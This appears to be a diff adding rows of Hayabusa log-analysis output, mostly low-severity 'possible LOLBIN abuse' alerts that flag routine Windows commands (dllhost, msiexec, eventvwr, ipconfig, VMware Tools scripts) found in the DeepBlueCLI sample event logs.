+2016-08-30 22:21:18.584 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17c4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 22:21:41.261 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x304 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 22:22:15.298 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x3a0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 22:22:37.732 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1194 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-30 23:36:31.003 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1130 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 00:21:31.129 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\System32\msiexec.exe"" /i ""C:\Users\IEUser\Downloads\EMET Setup.msi"" | Path: C:\Windows\System32\msiexec.exe | PID: 0xaf0 | User: IEUser | LID: 0x4d011",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 00:21:31.333 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\msiexec.exe /V | Path: C:\Windows\System32\msiexec.exe | PID: 0x11dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 02:31:58.790 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x15c | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 02:31:58.886 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0xcac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 02:32:06.392 +09:00,IE10Win7,7045,info,,New Service Installed,"Name: Mozilla Maintenance Service | Path: ""C:\Program Files\Mozilla Maintenance Service\maintenanceservice.exe"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2016-08-31 02:32:07.392 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13ac | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:26:31.346 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1560 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:53:34.038 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11d4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:53:34.114 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1284 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:54:17.892 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe18 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:54:17.934 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x880 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:55:17.369 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1670 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:55:17.405 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xd58 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:55:29.358 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x8dc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:55:29.420 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-system.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x748 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:56:17.432 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1788 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:56:17.468 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8e4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:56:42.015 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xe70 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:56:42.074 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xfd4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:59:41.893 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xfac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 03:59:41.954 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1798 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:00:08.701 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x14ac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:00:08.738 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1708 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:00:25.559 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0xf80 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:00:25.615 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x2a4 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:00:45.207 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x298 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:00:45.252 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xf44 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:02:16.930 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x4cc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:02:16.995 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x1520 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:03:18.080 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x11fc | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 04:03:18.108 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\win7-trial-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0xaac | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 05:48:41.903 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13b8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 05:49:01.091 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x14c8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 05:50:48.340 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x7dc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 05:51:10.630 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x10f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:09:04.159 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1064 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:09:04.174 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0xb50 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:11:15.295 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12b4 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:11:16.100 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x1264 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:11:16.210 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1694 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:11:29.568 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x12c0 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:11:35.821 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1300 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:12:06.943 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\suspend-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x738 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-08-31 09:12:06.951 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /release | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1128 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 00:54:06.516 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: sc.exe start sppsvc | Path: C:\Windows\System32\sc.exe | PID: 0x1100 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 00:54:07.012 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13f8 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 00:54:07.725 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\cmd.exe /c """"C:\Program Files\VMware\VMware Tools\resume-vm-default.bat"""" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 00:54:07.802 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\ipconfig /renew | Path: C:\Windows\System32\ipconfig.exe | PID: 0x1744 | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 00:54:09.426 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: C:\Windows\system32\schtasks.exe /delete /f /TN ""Microsoft\Windows\Customer Experience Improvement Program\Uploader"" | Path: C:\Windows\System32\schtasks.exe | PID: 0x1464 | User: IE10WIN7$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 00:54:28.302 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{F9717507-6651-4EDB-BFF7-AE615179BCCF} | Path: C:\Windows\System32\dllhost.exe | PID: 0x17bc | User: IE10WIN7$ | LID: 0x3e7,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 01:12:27.928 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\eventvwr.exe"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\eventvwr.exe | PID: 0x1274 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2016-09-02 01:12:27.973 +09:00,IE10Win7,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\mmc.exe"" ""C:\Windows\system32\eventvwr.msc"" /l:""C:\Users\IEUser\Documents\Win7-security.evtx"" | Path: C:\Windows\System32\mmc.exe | PID: 0x8d0 | User: IEUser | LID: 0x4cfe1",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
